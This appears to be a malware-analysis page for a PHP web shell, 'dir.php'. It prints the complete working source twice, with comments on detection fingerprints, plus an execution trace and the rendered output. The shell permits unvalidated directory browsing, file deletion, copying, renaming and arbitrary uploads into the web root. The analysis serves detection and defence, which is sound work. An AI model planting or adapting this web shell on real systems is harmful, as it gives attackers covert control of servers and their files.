PHP Malware Analysis

dir.php

md5: 59d5a0e5407af0ddd443f593ece9d06d


Deobfuscated PHP code

<?php
// Liveness probe: any request carrying a `check` query parameter gets the
// fixed body "checked" and nothing else. A request with `check` answered by
// exactly that 7-byte body is a cheap log/IDS signature for this sample.
if (isset($_GET['check'])) {
    echo "checked";
    exit;
}
// First-run setup of the hosting directory's access policy: if no .htaccess
// exists beside the script, one is written that admits every client
// ("Allow from all") and turns off directory indexes ("Options -Indexes").
// "Allow from all" is Apache 2.2 syntax; on 2.4 it only takes effect with
// mod_access_compat loaded — verify against the deployed httpd. The fopen()
// result is not checked, so a failed write passes silently. An .htaccess with
// exactly this content next to a PHP file is a file-integrity indicator.
if (!file_exists(".htaccess")) {
    $text = "\r\nAllow from all\r\nOptions -Indexes\r\n        ";
    $fp = fopen(".htaccess", "w");
    fwrite($fp, $text);
    fclose($fp);
}
?>


<html><body>
<!-- Static page shell emitted before the second PHP segment runs. There is no
     <head> or charset declaration in the source; the Generated HTML section on
     this page shows an empty <head> that the rendering side supplied. The
     stylesheet (Verdana 11px, colours #33CC99 / #269771 / #3399FF, the
     capitalised "Color:" property) is constant across runs and is a usable
     fingerprint for matching this family in captured response bodies. -->
<style type="text/css">
    body{
        background: #ffffff;
        color: #666666;
        font-family: Verdana;
        font-size: 11px;
    }
    a:link{
        color: #33CC99;
    }
    a:visited{
        color: #269771;
    }
    a:hover{
        text-decoration: none;
        Color: #3399FF;
    }
    table {
        font-size: 11px;
    }
</style>
<?php 
// Suppress every PHP diagnostic and remove the execution time limit, so the
// failing filesystem calls further down leave no warning in the response or
// the server error log, and long operations are not cut off.
error_reporting(0);
set_time_limit(0);
// The working directory is taken verbatim from the `dir` query parameter,
// falling back to the script's own cwd. No normalisation, allow-list or
// document-root check is applied: any directory the PHP worker can chdir()
// into becomes the listing root. Note that empty() also treats "0" as unset.
if (empty($_GET['dir'])) {
    $dir = getcwd();
} else {
    $dir = $_GET['dir'];
}
chdir($dir);
// Self-referencing base URL reused by every form and link on the page. It is
// HTML-escaped once here; the entry names appended to it later are not.
$current = htmlentities($_SERVER['PHP_SELF'] . "?dir=" . $dir);
// Banner: host name, effective directory after chdir(), and the server
// software string — environment reconnaissance echoed straight to the client.
// The opening <i> is never closed, which is why the rendered output (see the
// Generated HTML section) has the whole listing inside the italic element.
echo "<i>Server: " . $_SERVER['SERVER_NAME'] . "<br>";
echo "Current directory: " . getcwd() . "<br>";
echo "Software: " . $_SERVER['SERVER_SOFTWARE'];
echo "<br>";
echo "<br>";
// Upload form: multipart POST back to this script with mode=upload.
echo "<form action = '" . $current . "&mode=upload' method = 'POST' ENCTYPE='multipart/form-data'>\n";
echo "Local file: <input type = 'file' name = 'upload_file'>";
echo "<input type = 'submit' value = 'Upload'>";
echo "</form><br>";
// Operation selector. On a bare request the index is unset and $mode is NULL
// (the execution trace on this page records `$mode = NULL`); NULL matches
// none of the string labels below, so the page falls through to the listing.
$mode = $_GET['mode'];
switch ($mode) {
    // Every branch takes its path(s) verbatim from the query string or POST
    // body and hands them to the filesystem call with no validation, then
    // echoes the outcome with the request-supplied name unescaped. Because
    // error_reporting(0) is in force, a failing call only produces the
    // "Unable to ..." line, never a warning.
    case 'delete':
        // Removes the file named by `file`, resolved relative to $dir.
        $file = $_GET['file'];
        if (unlink($file)) {
            echo $file . " deleted successfully.<p>";
        } else {
            echo "Unable to delete " . $file . ".<p>";
        }
        break;
    case 'copy':
        // Two-step operation: a GET with `src` renders a destination form,
        // the subsequent POST with `dst` performs the copy. empty() also
        // rejects a destination of "0".
        $src = $_GET['src'];
        $dst = $_POST['dst'];
        if (empty($dst)) {
            echo "<form action = '" . $current . "&mode=copy&src=" . $src . "' method = 'POST'>\n";
            echo "Destination: <input name = 'dst'><br>\n";
            echo "<input type = 'submit' value = 'Copy'></form>\n";
        } else {
            if (copy($src, $dst)) {
                echo "File copied successfully.<p>\n";
            } else {
                echo "Unable to copy " . $src . ".<p>\n";
            }
        }
        break;
    case 'move':
        // Same two-step shape as 'copy', implemented with rename().
        $src = $_GET['src'];
        $dst = $_POST['dst'];
        if (empty($dst)) {
            echo "<form action = '" . $current . "&mode=move&src=" . $src . "' method = 'POST'>\n";
            echo "Destination: <input name = 'dst'><br>\n";
            echo "<input type = 'submit' value = 'Move'></form>\n";
        } else {
            if (rename($src, $dst)) {
                echo "File moved successfully.<p>\n";
            } else {
                echo "Unable to move " . $src . ".<p>\n";
            }
        }
        break;
    case 'rename':
        // Functionally identical to 'move'; only the parameter names
        // (`old`/`new`) and the message wording differ.
        $old = $_GET['old'];
        $new = $_POST['new'];
        if (empty($new)) {
            echo "<form action = '" . $current . "&mode=rename&old=" . $old . "' method = 'POST'>\n";
            echo "New name: <input name = 'new'><br>\n";
            echo "<input type = 'submit' value = 'Rename'></form>\n";
        } else {
            if (rename($old, $new)) {
                echo "File/Directory renamed successfully.<p>\n";
            } else {
                echo "Unable to rename " . $old . ".<p>\n";
            }
        }
        break;
    case 'rmdir':
        // rmdir() succeeds only on an empty directory. The listing below
        // offers this link for every directory entry, including "." and "..".
        $rm = $_GET['rm'];
        if (rmdir($rm)) {
            echo "Directory removed successfully.<p>\n";
        } else {
            echo "Unable to remove " . $rm . ".<p>\n";
        }
        break;
    case 'upload':
        // Stores the multipart upload under its client-supplied name in the
        // current working directory. basename() drops any directory part, so
        // the destination is always inside $dir, but the extension and
        // content are not checked. The trailing unlink($temp) runs after
        // move_uploaded_file() has already relocated the temp file and so
        // fails silently. A request-controlled file name written into a
        // web-served directory is the highest-impact path in this file and
        // the one most worth alerting on (new PHP files under the web root).
        $temp = $_FILES['upload_file']['tmp_name'];
        $file = basename($_FILES['upload_file']['name']);
        if (!empty($file)) {
            if (move_uploaded_file($temp, $file)) {
                echo "File uploaded successfully.<p>\n";
                unlink($temp);
            } else {
                echo "Unable to upload " . $file . ".<p>\n";
            }
        }
        break;
}
// Drop cached stat() results so the listing reflects whatever the switch
// above just changed on disk.
clearstatcache();
echo "<pre>\n\n</pre>";
echo "<table width = 100%>\n";
// scandir() returns "." and ".." as well, and neither loop filters them out,
// so both appear as navigable/removable rows (visible in the Generated HTML).
$files = scandir($dir);
// Pass 1: directories. The item count subtracts the two dot entries.
foreach ($files as $file) {
    if (is_dir($file)) {
        $items = scandir($file);
        $items_num = count($items) - 2;
        // Entry names are concatenated into unquoted href attributes without
        // any escaping; only $current went through htmlentities() above.
        echo "<tr><td><a href = " . $current . "/" . $file . ">" . $file . "</a></td>";
        echo "<td>" . $items_num . " Items</td>";
        echo "<td><a href = " . $current . "&mode=rmdir&rm=" . $file . ">Remove directory</a></td>";
        echo "<td>-</td>";
        echo "<td>-</td>";
        echo "<td><a href = " . $current . "&mode=rename&old=" . $file . ">Rename directory</a></td></tr>";
    }
}
// Pass 2: regular files, with size in KB (two decimals) and one action link
// per mode handled above.
foreach ($files as $file) {
    if (is_file($file)) {
        $size = round(filesize($file) / 1024, 2);
        echo "<tr><td>" . $file . "</td>";
        echo "<td>" . $size . " KB</td>";
        echo "<td><a href = " . $current . "&mode=delete&file=" . $file . ">Delete</a></td>";
        echo "<td><a href = " . $current . "&mode=copy&src=" . $file . ">Copy</a></td>";
        echo "<td><a href = " . $current . "&mode=move&src=" . $file . ">Move</a></td>";
        // "Remame" is the sample's own typo; it is a stable string for
        // matching this family in captured response bodies.
        echo "<td><a href = " . $current . "&mode=rename&old=" . $file . ">Remame</a></td></tr>";
    }
}
echo "</table><br>";

Execution traces

data/traces/59d5a0e5407af0ddd443f593ece9d06d_trace-1676254908.666.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:22:14.563824]
1	0	1	0.000245	393512
1	3	0	0.000443	420440	{main}	1		/var/www/html/uploads/dir.php	0	0
2	4	0	0.000461	420440	file_exists	0		/var/www/html/uploads/dir.php	7	1	'.htaccess'
2	4	1	0.000484	420480
2	4	R			TRUE
2	5	0	0.000500	420440	error_reporting	0		/var/www/html/uploads/dir.php	42	1	0
2	5	1	0.000514	420480
2	5	R			22527
2	6	0	0.000527	420440	set_time_limit	0		/var/www/html/uploads/dir.php	43	1	0
2	6	1	0.000542	420504
2	6	R			FALSE
2	7	0	0.000555	420472	getcwd	0		/var/www/html/uploads/dir.php	46	0
2	7	1	0.000568	420520
2	7	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/dir.php	46	$dir = '/var/www/html/uploads'
2	8	0	0.000597	420520	chdir	0		/var/www/html/uploads/dir.php	50	1	'/var/www/html/uploads'
2	8	1	0.000612	420608
2	8	R			TRUE
2	9	0	0.000626	420648	htmlentities	0		/var/www/html/uploads/dir.php	51	1	'/uploads/dir.php?dir=/var/www/html/uploads'
2	9	1	0.000642	420840
2	9	R			'/uploads/dir.php?dir=/var/www/html/uploads'
1		A						/var/www/html/uploads/dir.php	51	$current = '/uploads/dir.php?dir=/var/www/html/uploads'
2	10	0	0.000671	420728	getcwd	0		/var/www/html/uploads/dir.php	54	0
2	10	1	0.000683	420776
2	10	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/dir.php	63	$mode = NULL
2	11	0	0.000713	420728	clearstatcache	0		/var/www/html/uploads/dir.php	140	0
2	11	1	0.000726	420728
2	11	R			NULL
2	12	0	0.000739	420728	scandir	0		/var/www/html/uploads/dir.php	143	1	'/var/www/html/uploads'
2	12	1	0.000770	421344
2	12	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'dir.php', 5 => 'prepend.php']
1		A						/var/www/html/uploads/dir.php	143	$files = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'dir.php', 5 => 'prepend.php']
2	13	0	0.000808	421312	is_dir	0		/var/www/html/uploads/dir.php	145	1	'.'
2	13	1	0.000822	421360
2	13	R			TRUE
2	14	0	0.000835	421320	scandir	0		/var/www/html/uploads/dir.php	146	1	'.'
2	14	1	0.000858	421936
2	14	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'dir.php', 5 => 'prepend.php']
1		A						/var/www/html/uploads/dir.php	146	$items = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'dir.php', 5 => 'prepend.php']
1		A						/var/www/html/uploads/dir.php	147	$items_num = 4
2	15	0	0.000906	421904	is_dir	0		/var/www/html/uploads/dir.php	145	1	'..'
2	15	1	0.000920	421944
2	15	R			TRUE
2	16	0	0.000933	421904	scandir	0		/var/www/html/uploads/dir.php	146	1	'..'
2	16	1	0.000954	422408
2	16	R			[0 => '.', 1 => '..', 2 => 'uploads']
1		A						/var/www/html/uploads/dir.php	146	$items = [0 => '.', 1 => '..', 2 => 'uploads']
1		A						/var/www/html/uploads/dir.php	147	$items_num = 1
2	17	0	0.000997	421792	is_dir	0		/var/www/html/uploads/dir.php	145	1	'.htaccess'
2	17	1	0.001011	421840
2	17	R			FALSE
2	18	0	0.001024	421800	is_dir	0		/var/www/html/uploads/dir.php	145	1	'data'
2	18	1	0.001037	421832
2	18	R			TRUE
2	19	0	0.001050	421792	scandir	0		/var/www/html/uploads/dir.php	146	1	'data'
2	19	1	0.001071	422320
2	19	R			[0 => '.', 1 => '..', 2 => 'trace-1676254908.666.xt.gz']
1		A						/var/www/html/uploads/dir.php	146	$items = [0 => '.', 1 => '..', 2 => 'trace-1676254908.666.xt.gz']
1		A						/var/www/html/uploads/dir.php	147	$items_num = 1
2	20	0	0.001115	421816	is_dir	0		/var/www/html/uploads/dir.php	145	1	'dir.php'
2	20	1	0.001129	421856
2	20	R			FALSE
2	21	0	0.001142	421816	is_dir	0		/var/www/html/uploads/dir.php	145	1	'prepend.php'
2	21	1	0.001155	421864
2	21	R			FALSE
2	22	0	0.001169	421824	is_file	0		/var/www/html/uploads/dir.php	157	1	'.'
2	22	1	0.001183	421856
2	22	R			FALSE
2	23	0	0.001195	421816	is_file	0		/var/www/html/uploads/dir.php	157	1	'..'
2	23	1	0.001209	421856
2	23	R			FALSE
2	24	0	0.001222	421816	is_file	0		/var/www/html/uploads/dir.php	157	1	'.htaccess'
2	24	1	0.001235	421864
2	24	R			TRUE
2	25	0	0.001248	421824	filesize	0		/var/www/html/uploads/dir.php	158	1	'.htaccess'
2	25	1	0.001261	421864
2	25	R			64
2	26	0	0.001273	421824	round	0		/var/www/html/uploads/dir.php	158	2	0.0625	2
2	26	1	0.001287	421896
2	26	R			0.06
1		A						/var/www/html/uploads/dir.php	158	$size = 0.06
2	27	0	0.001319	421824	is_file	0		/var/www/html/uploads/dir.php	157	1	'data'
2	27	1	0.001333	421856
2	27	R			FALSE
2	28	0	0.001346	421816	is_file	0		/var/www/html/uploads/dir.php	157	1	'dir.php'
2	28	1	0.001359	421856
2	28	R			TRUE
2	29	0	0.001372	421816	filesize	0		/var/www/html/uploads/dir.php	158	1	'dir.php'
2	29	1	0.001384	421856
2	29	R			5226
2	30	0	0.001396	421816	round	0		/var/www/html/uploads/dir.php	158	2	5.103515625	2
2	30	1	0.001409	421888
2	30	R			5.1
1		A						/var/www/html/uploads/dir.php	158	$size = 5.1
2	31	0	0.001435	421816	is_file	0		/var/www/html/uploads/dir.php	157	1	'prepend.php'
2	31	1	0.001450	421864
2	31	R			TRUE
2	32	0	0.001462	421824	filesize	0		/var/www/html/uploads/dir.php	158	1	'prepend.php'
2	32	1	0.001475	421864
2	32	R			57
2	33	0	0.001487	421824	round	0		/var/www/html/uploads/dir.php	158	2	0.0556640625	2
2	33	1	0.001500	421896
2	33	R			0.06
1		A						/var/www/html/uploads/dir.php	158	$size = 0.06
1	3	1	0.001527	421824
			0.001555	315776
TRACE END   [2023-02-13 00:22:14.565172]


Generated HTML code

<html><head></head><body>
<style type="text/css">
    body{
        background: #ffffff;
        color: #666666;
        font-family: Verdana;
        font-size: 11px;
    }
    a:link{
        color: #33CC99;
    }
    a:visited{
        color: #269771;
    }
    a:hover{
        text-decoration: none;
        Color: #3399FF;
    }
    table {
        font-size: 11px;
    }
</style>
<i>Server: localhost<br>Current directory: /var/www/html<br>Software: Apache/2.4.52 (Ubuntu)<br><br><form action="/dir.php?dir=/var/www/html&amp;mode=upload" method="POST" enctype="multipart/form-data">
Local file: <input type="file" name="upload_file"><input type="submit" value="Upload"></form><br><pre>
</pre><table width="100%">
<tbody><tr><td><a href="/dir.php?dir=/var/www/html/.">.</a></td><td>3 Items</td><td><a href="/dir.php?dir=/var/www/html&amp;mode=rmdir&amp;rm=.">Remove directory</a></td><td>-</td><td>-</td><td><a href="/dir.php?dir=/var/www/html&amp;mode=rename&amp;old=.">Rename directory</a></td></tr><tr><td><a href="/dir.php?dir=/var/www/html/..">..</a></td><td>2 Items</td><td><a href="/dir.php?dir=/var/www/html&amp;mode=rmdir&amp;rm=..">Remove directory</a></td><td>-</td><td>-</td><td><a href="/dir.php?dir=/var/www/html&amp;mode=rename&amp;old=..">Rename directory</a></td></tr><tr><td>.htaccess</td><td>0.04 KB</td><td><a href="/dir.php?dir=/var/www/html&amp;mode=delete&amp;file=.htaccess">Delete</a></td><td><a href="/dir.php?dir=/var/www/html&amp;mode=copy&amp;src=.htaccess">Copy</a></td><td><a href="/dir.php?dir=/var/www/html&amp;mode=move&amp;src=.htaccess">Move</a></td><td><a href="/dir.php?dir=/var/www/html&amp;mode=rename&amp;old=.htaccess">Remame</a></td></tr><tr><td>beneri.se_malware_analysis</td><td>0 KB</td><td><a href="/dir.php?dir=/var/www/html&amp;mode=delete&amp;file=beneri.se_malware_analysis">Delete</a></td><td><a href="/dir.php?dir=/var/www/html&amp;mode=copy&amp;src=beneri.se_malware_analysis">Copy</a></td><td><a href="/dir.php?dir=/var/www/html&amp;mode=move&amp;src=beneri.se_malware_analysis">Move</a></td><td><a href="/dir.php?dir=/var/www/html&amp;mode=rename&amp;old=beneri.se_malware_analysis">Remame</a></td></tr><tr><td>dir.php</td><td>5.1 KB</td><td><a href="/dir.php?dir=/var/www/html&amp;mode=delete&amp;file=dir.php">Delete</a></td><td><a href="/dir.php?dir=/var/www/html&amp;mode=copy&amp;src=dir.php">Copy</a></td><td><a href="/dir.php?dir=/var/www/html&amp;mode=move&amp;src=dir.php">Move</a></td><td><a href="/dir.php?dir=/var/www/html&amp;mode=rename&amp;old=dir.php">Remame</a></td></tr></tbody></table><br></i></body></html>

Original PHP code

<?php
	// Verbatim sample as recovered (hash at the top of this page). Probe
	// endpoint: a request carrying `check` answers with the fixed body
	// "checked" and exits — a cheap log signature for this file.
	if (isset ($_GET['check'])) {
		echo "checked";
		exit;
	}

    // Drops an .htaccess that admits every client and disables directory
    // indexes if none exists beside the script. "Allow from all" is Apache
    // 2.2 syntax (needs mod_access_compat on 2.4 — verify); the fopen()
    // result is never checked.
    if (!file_exists(".htaccess")) {
        $text = "
Allow from all
Options -Indexes
        ";
        $fp = fopen(".htaccess", "w");
        fwrite($fp, $text);
        fclose($fp);
    }
?>


<html><body>
<!-- Static page shell from the recovered sample; no <head> or charset is
     declared. The stylesheet is constant across runs (Verdana 11px, colours
     #33CC99 / #269771 / #3399FF, capitalised "Color:") and is usable as a
     fingerprint when matching captured response bodies. -->
<style type="text/css">
    body{
        background: #ffffff;
        color: #666666;
        font-family: Verdana;
        font-size: 11px;
    }
    a:link{
        color: #33CC99;
    }
    a:visited{
        color: #269771;
    }
    a:hover{
        text-decoration: none;
        Color: #3399FF;
    }
    table {
        font-size: 11px;
    }
</style>
<?php
// Global diagnostic suppression and no execution time limit: failing
// filesystem calls further down leave nothing in the response or error log.
error_reporting (0);
set_time_limit (0);

// Working directory comes straight from the `dir` query parameter with no
// path validation; any directory the PHP worker can enter becomes the root.
if (empty ($_GET ['dir'])){
    $dir = getcwd ();
} else {
    $dir = $_GET ['dir'];
}
chdir ($dir);
// Base URL for every link and form; escaped once here, the entry names
// appended to it later are not.
$current = htmlentities ($_SERVER ['PHP_SELF'] . "?dir=" . $dir);

// Environment banner echoed to the client. The <i> is never closed.
echo "<i>Server: " . $_SERVER ['SERVER_NAME'] . "<br>";
echo "Current directory: " . getcwd () . "<br>";
echo "Software: " . $_SERVER ['SERVER_SOFTWARE'];
echo "<br>";
echo "<br>";
// Multipart upload form posting back to this script with mode=upload.
echo "<form action = '" . $current . "&mode=upload' method = 'POST' ENCTYPE='multipart/form-data'>\n";
echo "Local file: <input type = 'file' name = 'upload_file'>";
echo "<input type = 'submit' value = 'Upload'>";
echo "</form><br>";

// Operation selector; an absent parameter yields NULL, which matches no case,
// so a bare request only renders the listing. Each branch passes request
// values to the filesystem call unchanged and echoes them back unescaped;
// with error_reporting(0) a failure only yields the "Unable to ..." line.
$mode = $_GET ['mode'];
switch ($mode) {
    case 'delete':
        $file = $_GET ['file'];
        if (unlink($file)) {
            echo $file . " deleted successfully.<p>";
        } else {
            echo "Unable to delete " . $file . ".<p>";
        }
        break;
    case 'copy':
        // GET with `src` renders the destination form; POST with `dst` copies.
        $src = $_GET ['src'];
        $dst = $_POST ['dst'];
        if (empty ($dst)) {
            echo "<form action = '" . $current . "&mode=copy&src=" . $src . "' method = 'POST'>\n";
            echo "Destination: <input name = 'dst'><br>\n";
            echo "<input type = 'submit' value = 'Copy'></form>\n";
        } else {
            if (copy($src, $dst)) {
                echo "File copied successfully.<p>\n";
            } else {
                echo "Unable to copy " . $src . ".<p>\n";
            }
        }
        break;
    case 'move':
        // Same two-step shape as 'copy', implemented with rename().
        $src = $_GET ['src'];
        $dst = $_POST ['dst'];
        if (empty ($dst)) {
            echo "<form action = '" . $current . "&mode=move&src=" . $src . "' method = 'POST'>\n";
            echo "Destination: <input name = 'dst'><br>\n";
            echo "<input type = 'submit' value = 'Move'></form>\n";
        } else {
            if (rename($src, $dst)) {
                echo "File moved successfully.<p>\n";
            } else {
                echo "Unable to move " . $src . ".<p>\n";
            }
        }
        break;
    case 'rename':
        // Functionally identical to 'move'; only parameter names and
        // message wording differ.
        $old = $_GET ['old'];
        $new = $_POST ['new'];
        if (empty ($new)) {
            echo "<form action = '" . $current . "&mode=rename&old=" . $old . "' method = 'POST'>\n";
            echo "New name: <input name = 'new'><br>\n";
            echo "<input type = 'submit' value = 'Rename'></form>\n";
        } else {
            if (rename($old, $new)) {
                echo "File/Directory renamed successfully.<p>\n";
            } else {
                echo "Unable to rename " . $old . ".<p>\n";
            }
        }
        break;

    case 'rmdir':
        // rmdir() succeeds only on an empty directory.
        $rm = $_GET ['rm'];
        if (rmdir($rm)) {
            echo "Directory removed successfully.<p>\n";
        } else {
            echo "Unable to remove " . $rm . ".<p>\n";
        }
        break;
    case 'upload':
        // Writes the upload under its client-supplied basename into the
        // current directory with no extension or content check; the later
        // unlink($temp) acts on an already-moved temp file and fails quietly.
        // New PHP files appearing under the web root are the signal to watch.
        $temp = $_FILES['upload_file']['tmp_name'];
        $file = basename($_FILES['upload_file']['name']);
        if (!empty ($file)) {
            if (move_uploaded_file($temp, $file)) {
                echo "File uploaded successfully.<p>\n";
                unlink($temp);
            } else {
                echo "Unable to upload " . $file . ".<p>\n";
            }
        }
        break;
}
// Refresh cached stat() results, then list $dir: directories first (item
// count minus the two dot entries), then regular files with size in KB.
// "." and ".." are not filtered and get rows of their own.
clearstatcache ();
echo "<pre>\n\n</pre>";
echo "<table width = 100%>\n";
$files = scandir ($dir);
foreach ($files as $file){
    if (is_dir ($file)){
        $items = scandir ($file);
        $items_num = count ($items) - 2;
        // Entry names go into unquoted href attributes without escaping.
        echo "<tr><td><a href = ".$current . "/" . $file.">".$file."</a></td>";
        echo "<td>".$items_num." Items</td>";
        echo "<td><a href = ".$current . "&mode=rmdir&rm=".$file.">Remove directory</a></td>";
        echo "<td>-</td>";
        echo "<td>-</td>";
        echo "<td><a href = ".$current . "&mode=rename&old=".$file.">Rename directory</a></td></tr>";
    }
}
foreach ($files as $file){
    if (is_file ($file)){
        $size = round (filesize ($file) / 1024, 2);
        echo "<tr><td>".$file."</td>";
        echo "<td>".$size." KB</td>";
        echo "<td><a href = ".$current . "&mode=delete&file=".$file.">Delete</a></td>";
        echo "<td><a href = ".$current . "&mode=copy&src=".$file.">Copy</a></td>";
        echo "<td><a href = ".$current . "&mode=move&src=".$file.">Move</a></td>";
        // "Remame" is the sample's own typo — a stable string for matching
        // this family in captured response bodies.
        echo "<td><a href = ".$current . "&mode=rename&old=".$file.">Remame</a></td></tr>";
    }
}
echo "</table><br>";